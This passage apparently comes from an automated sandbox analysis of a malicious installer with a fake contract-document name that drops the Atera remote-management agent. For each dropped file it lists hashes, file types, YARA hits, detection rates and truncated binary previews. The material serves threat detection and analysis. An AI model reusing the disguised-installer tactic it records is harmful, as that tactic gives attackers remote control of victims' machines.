                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        442ad7.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        442ad8.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        442ad9.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        442ada.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        442adb.rbf (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Config.Msi\442acf.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8861
                                                                                                                                                                                                                                        Entropy (8bit):5.659410152697468
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:PgjYxz1ccbTOOeMe4M61h7r6IHfh7r6kAVv70HVotBVeZEmzmYpLAV77yXpY92r:YUD2eppptiB2ie
                                                                                                                                                                                                                                        MD5:7D58F45A84261819E04B760FDF79613B
                                                                                                                                                                                                                                        SHA1:239B37935BD891383CD89A74C2662B0DC832F2FC
                                                                                                                                                                                                                                        SHA-256:7B16F00E4A1780511B672727F17CEB5B1029CE81ACBD7BB4ED5963D8C7DF5F64
                                                                                                                                                                                                                                        SHA-512:845E8EE030F72A4E23BF2FB08E3FA694766083CC9FB0D4BA53818EA78254ADCF4A877F132F052ECD9C2D6031BAD2F08F0C7026E00E899864057E894090BCE666
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\442acf.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent&.Documento_Contrato_Seguro_25105476.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45

                                                                                                                                                                                                                                        C:\Config.Msi\442ad4.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9527
                                                                                                                                                                                                                                        Entropy (8bit):5.5636814163820665
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:WgjYGCcRobLCsgRgbLCMDp17qEVl0QLLALtyD0qagukGGhaKfmbHt1fGOkgrEcZ:TU2RegRGdpKKXO1T
                                                                                                                                                                                                                                        MD5:F74D1F87A7A08EAE47E38C5C00A18544
                                                                                                                                                                                                                                        SHA1:5D75D1141511991A33F106716EEF635382A1DDE1
                                                                                                                                                                                                                                        SHA-256:9C841B4B06027216082D90488645CFBC055457B3D6E6DBB605322A04C533A085
                                                                                                                                                                                                                                        SHA-512:DD947EC4C9BF68C518B0DA8AFB85B58E8A70F19B82574AC389F592D52AE25C1735DEA18D1AB4D858C46BE29F04D97CDF291133852429681E66994243AE8F9B20
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\442ad4.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent&.Documento_Contrato_Seguro_25105476.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....InstallInitialize$..@....z.Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\Transforms...@....(.$..@....@.Software\Microsoft\Windows\CurrentVersion\Installer\TempPackages...@....(.&...C:\Windows\Installer\442ad0.msi..#0$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\7D0A237E2F2A7564CA141B792446E854\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....%...AuthorizedCDFPrefix%...Comments%...Contact%...DisplayVersion..1.8

                                                                                                                                                                                                                                        C:\Config.Msi\442adc.rbs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8767
                                                                                                                                                                                                                                        Entropy (8bit):5.65306472304662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:MTy7wo+fncHMeW186IT86k7s5VNpkxYpLso:+Po+fncHy8V8tSNpkcP
                                                                                                                                                                                                                                        MD5:7B0343793072BDC9A0F3DFF8143E7CAA
                                                                                                                                                                                                                                        SHA1:5B32D0B551666A949D3E969FE4295EB4E2B918FB
                                                                                                                                                                                                                                        SHA-256:75FBD65439C0F31B84315AC719C1CA0633ABDCED8F12432EB7C9B4630A06B3DE
                                                                                                                                                                                                                                        SHA-512:FCD419D360F55F389FDBC8D8F14379F356576F426EAA410EB7B93C93CD248A46D93641852EFC0BF156E0B5D41C7A2A4F04CD1E333F554BE1FC1C8F720C10EEBC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\442adc.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}.@......

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
